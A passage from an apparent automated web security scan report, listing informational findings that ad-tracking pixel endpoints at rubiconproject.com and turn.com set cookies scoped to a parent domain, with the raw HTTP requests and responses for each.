Date: Fri, 17 Jun 2011 10:42:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%264222%3D1; expires=Sun, 17-Jul-2011 10:42:26 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C0%2C2%2C%2C; expires=Sun, 17-Jul-2011 10:42:26 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; expires=Sun, 17-Jul-2011 10:42:26 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.221. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%265326%3D1%265364%3D1; expires=Sat, 16-Jul-2011 11:29:51 GMT; path=/; domain=.rubiconproject.com
put_2046=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; expires=Sat, 16-Jul-2011 11:29:51 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5364&nid=2046&expires=30&put=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26Nu%3DP_PARENT_ID%26searchNav%3Dtrue&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_two=3bc35c3f-44ee-45ce-a5d3-315a00fe8438&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%262827%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%263810%3D12675%2C0%2C1%2C%2C%262374%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C; put_1197=3460050161923843111; cd=false; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:29:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%265326%3D1%265364%3D1; expires=Sat, 16-Jul-2011 11:29:51 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%262827%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%265326%3D12747%2C0%2C1%2C14%2C%265364%3D12747%2C0%2C1%2C%2C; expires=Sat, 16-Jul-2011 11:29:51 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2046=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; expires=Sat, 16-Jul-2011 11:29:51 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.222. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 11:28:42 GMT; Path=/
pf=fhA4EA1v0vr5FnVTvwlQD8K_9kSi34Fh5czW3ZLFH71rcFW6poMFjuQuzMPstcOZ2GHZm3PL_0ZJzm4ZFVSYE8Duq7j3mYBLrRaQl7cOSC3bbe6c-Httg-DijmMpowplq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdlnCbKQptaZxbGUz6SlTnZDsK2rDt0bHrM544CpImVmkSAL_bstOXxNREWWjoLotWNuGCSfD1VO5qVu-qWBAgSu17OBqpU4PgvZpleNg0TWB0RMQGeS7_O3x1RSd2BwdXFbTy3K7n-2J0MAMXWCl91Alk4rQOdMMecrpXJTexKmmidw53l0QWbnqGQiRb9ZAs_QgD2QiSjBcYABPrjR7j2Lk3dbwCXD_XY4Mg3uZtdk-w7CLx2fkIxdgjO29elycICbV2IcqKk7eSEhOsR2I7EGmUrCtsiY1t4sA6JphOvlAw2WskIYUfYQOHF0V7XP3BnwAAohd7yjHvV65-NFPJ6k-u-He4VyfKWMt3v_OVQR5WJnhMTPJdNSN4V9p_6WYg3opYqtkQWt6725kkv7T1ST5UzgcmolTZJyYmPqM8Zx5g7UbhYw2jQWp91FsB5bAn8V7foSNbpzcCtEZ09ICcgOStrfC9SER61onVprd_onMryjVa6LMEO3kCLjO0IvNryW-5O2fQU_LHsnkesyo4l_i11ujvhhLGZ0k6S7VChstVJ88iyvvPxUtm5pXVUyRredJBloe4tetp7m__kLcfbP_Eqw2fpNrGQbnw-cmbaxS3fhnjhdAkaWgX2Wn9EHpE9nRxmNOfa7N8eKNOKfhfV_78LZJ3SfN4upb6BnAigOn-d0svVlW7kDvxwmUOO6di4L3hItnppqGTp1J33WvO-vJNJIZsJvokUWIw2BigWHhckIDi1Fkwg7XRH_BYZrAe39meCnmP7nr3-LKEGgJRL73oAwAGqSF7i_Nh_lHANdO2N4y0oQd9WbNchd4KJ0GSKpCvg4R8pLEeo1jSuGz7oMRCuDH5HeVZE_VQRFdHjYukJVRG_nBNs8V1gYCYsm415gn0H91lt8VKKWdXKqCTDOHhKd5JX6_fglnf3B3DmgLLJzD9On5Z3FQzHr3F5l8MAWEAnGYSU3-NOxK7uJcD_RRN6ky6CN1PuWwiDRMNWXU5_w-MjKW_GcbVrZmBGA1Mut6aa3Kh20avKWSvO9zAk-RcrayBwLlfQ6HJrTI2xWc5r5ahhRJbOL_KFk5m6LShjvKyOkYlhN9vFIet_K_9AtqbHgySr2KqGN9-ddSeXZA12yR4NFKSQVYrwFZeGZXu_hX3sKoCSIV4DWAcntMWndiH-vYNrPSKHelCwJAEbBWk-i6uJHnwpuo_ZlHWQ7Uow01sqOwZlLLH_X5cABcyU66VZIb4K9aY6J9YtdmBMo_MbyWI1dW0gjXofsjNDSVdmLkilEs-WrYhDZbcAUC80ovx39ycP1rWckNvY-gaRNscNt9mHktMDgPCf0UpOcSdXY1OdfB0pHhAy-UN7WkybRCuMZ-d6VJt7LsD-FnsnfZ8jbE_g98PqM_uWZz3crv1z5M8Pih0AXJSyUJ19uPJlG_3tcOZ-AmYnpm1EC9jEUmxwdT9kcJ4edcTEb0PB7-YTDSCBFoXDPahTXWMSS5FlUmssMmrL-8e41aSohTuap9UjfyHEsmR4UUOeK0HWz0NORe7zSZgfEzvdO7smtDILpMESpu_ZZWNCNkhXtVikoOt8vg9pIynRKrCXnowDQSRXo96RunD8qfbaYv7vzaVyY9QuY541PZO6Ny5vnKLIxfYwIsEt0kokdZeF3EOMiBo3Mk1h9PIxxR65ZOcJUjvfs2TVsX4KQGnKdgRSGoam5QlCCa_OGKS42qBmwv_wvY-RzCoz9_t8alDj5k8zTq0J4PqUJQ0otSVJy2PGeMK-XcarFw0nA3H-YF2Wl5Fn0PEnfhbtUbz9ct1MV79PyeyDZ9DvWp_EdJGyYA5O7dtrDry_s9lkRyz6GlDS8t-Rfdp17-epPba0D46AHy_lzghAFfvmsyLLawNKxCeHxRRevicSSfkeY6SuOCRIr05W-BHUNxq2SQwElM-yQwx2zQEg-z8-t9y-tMNQp-ZYdLjH27LJobmgwjquUBX0fZWtmyuXhGsmOr7JOEwxd8-DByQ2C9Yv7XgNTcfznCXbacaQtf_dWsSUQ8GKNCUK0zaUBXpMoL53_gWUTUNlxoMRwaryBWePdHp2MxlVET9_8XQcM4q6yLp52rmfN4q3l5EKsYbOM4UyWN4YxvN7y_b8zhiDb1QFGUx3T6Icw0cNHVJuxB7zpQOkrNL46G4jxTVXOyK2iEcB5PBiiMFehpPTzXehUikIWBvjjSGaDoOwEZA0LEeWwvlbOo8Dfurrf5fw5Oi; Domain=.turn.com; Expires=Tue, 13-Dec-2011 11:28:42 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=outdoors%3Eoutdoor%20power%20equipment%3Ewalk%20behind%20mowers;ord=9370099140796.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=jXzwVIIe0SAeD8gWPKjuE8-ct6tD5BWiUiYpsGFlfMC9NuH-7Dbi6B51EnTYR5-iOgZRRwBy6DZwiqOHT6IElDIDhxlaGx8hHg3wXZvgAhQmka8RIRKSsF1jjtV6gI5bljvN0VRTfDPzhiZhKzxoF_rp1CVxF2mczlcxrXlKeIt_e97B5v4gtIwRb9gWerT6SZNfDixsQmcvwT3cj6qsD1YUGW8kAIFGjnsHsQubrGhyd-a6SoFtlzPI1m7lqOrzKG62Ouoq_MnCBexx-IXs0wqFGi20iMryPzKhFIgD9TRKQvWi-gwfjmLH65nG8uDjmRHSyuQWrv6-0K13whBmqMMkBFHXgTQykKVmMrOXkTImGjDMOFGlcFZLXkL5DfMYlNewCtfBYR9k_ubONlcmrNayLhAfbvMx03_QEb7SwOTka-xiDvXxhOXZWX9LSHUpFSBC8e2rD9y9_y_vSTtwLnFM-trIKubtEmFArILuMGV9B58oEFeGFl-N6VKfU94TyqoDXT1z2-LOJoHJJmbycn2VdyRWMoz0MJ92lenB0Enr8KmRHccEmPJbfWloKMqvymfbnNdr76iq20r7UPWKf1cnuH7JxEukYFMLKmfTWaOhlAa-ABMwNuo7Vw33CB7yjmRrMK_4y831eM_Q9ai6iuVxKUcM2zvz07RwR2gDSZO0zsyFtWnf4bgu8uiMcKoKQubbDh7yy7VKoKm3NHyhBPpDv4R2b-LD02LPrfkDoNG-JVF8wGs9QJzZ7X7pmVv1-5-k8QZXYxxPHYXLZ5ZlZ7srGOrmHUGAGAa34SUV_msfG2VPWzgVAeVXUdcic92NhdIXeTMujO6Xkpxqvk5f7Z_aVKOVMmX7GzMccSixrr2FdtRzxraENBQImNBNPmc-76WiVavVIV7dEbeehfvbaQIeFks7prpU3JmJcp6gIfBHgMBwI4Gac8VWiyN-wrJTS7BG-ZJhaA-X7sZihqOeSt3vgqVyZFwe8tv4n9m4XgJOv117Rph82494QFH9nQMOF51d6EB91l-ccAJiFLF8DLuHEpZWJmKwAkG1noZuRpuds8Kghk77jmwldiTPqW35mHKeC6oTX7ekXkI-eu8dKRbg51Pc0eFE3yxviie2JbpWBf4tKIwkwF5Dm_ctyQmlyESbwyVENVhDk-GGLtG4XypAqI29qmodf8CikjvvqBW_WRb_aKxObPalYTPYr86KIHGoqY_KW-Dhqg1PeSYXuUuEVpM3EUxe8KvI5nEdFFnTVy1R1dEXFxxKtSs8wkDM-YxLbPfNba4kF5lJi_U8vGU0IUuOnRQIvCjdWVa1fEhK_KLr5Y7O86QRtAspzmaq-fVrQlWtpfPPkni3CRWGu0h_MtIqxu4McSiriw3E0ny2QdLUoe_B6wgU9jI28wBseOAtpy2e4Fv71-bKOrhX2Caw2SYtp2QZGcaXxiQod_wFsyaXwL0ukkjQ9Ipn5OBK8Esf3AI1vcHkbm5E8hsGB6_YqHw2pmgY9PCpH88o2V6QgiQM3tzkLdBmsBmrJxgO-qwkMNUHQPAIhFwOSHcQvhDlVNrjRUinuOAaHaBMki4; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 11:28:42 GMT; Path=/
Set-Cookie: pf=fhA4EA1v0vr5FnVTvwlQD8K_9kSi34Fh5czW3ZLFH71rcFW6poMFjuQuzMPstcOZ2GHZm3PL_0ZJzm4ZFVSYE8Duq7j3mYBLrRaQl7cOSC3bbe6c-Httg-DijmMpowplq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdlnCbKQptaZxbGUz6SlTnZDsK2rDt0bHrM5